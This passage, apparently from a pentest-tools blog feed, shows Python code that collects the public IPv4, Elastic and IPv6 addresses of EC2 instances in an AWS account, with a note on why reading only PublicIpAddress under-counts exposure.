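            found.append(addr)

    for reservation in response.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            add(instance.get("PublicIpAddress"))
            for eni in instance.get("NetworkInterfaces", []):
                add(eni.get("Association", {}).get("PublicIp"))
                for entry in eni.get("Ipv6Addresses", []):
                    add(entry.get("Ipv6Address"))
    return found


def fetch_ec2_public_ips(region: str, profile: Optional[str] = None) -> List[str]:
    """Live variant: page through DescribeInstances with boto3 in one region."""
    import boto3  # imported lazily so the offline helper above works without it
    session = boto3.session.Session(profile_name=profile, region_name=region)
    paginator = session.client("ec2").get_paginator("describe_instances")
    ips: List[str] = []
    for page in paginator.paginate():
        for ip in ec2_public_ips(page):
            if ip not in ips:
                ips.append(ip)
    return ips


if __name__ == "__main__":
    for ip in ec2_public_ips(SAMPLE_DESCRIBE_INSTANCES):
        print(ip)
```

Note that the secondary interface's Elastic IP is only visible through NetworkInterfaces, which is why an inventory built from PublicIpAddress alone under-counts the account's exposure; a real run also has to repeat the call per region.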

Link: http://feedproxy.google.com/~r/PentestTools/~3/aLYdLNP_wx4/awspublicips-fetch-all-public-ip.html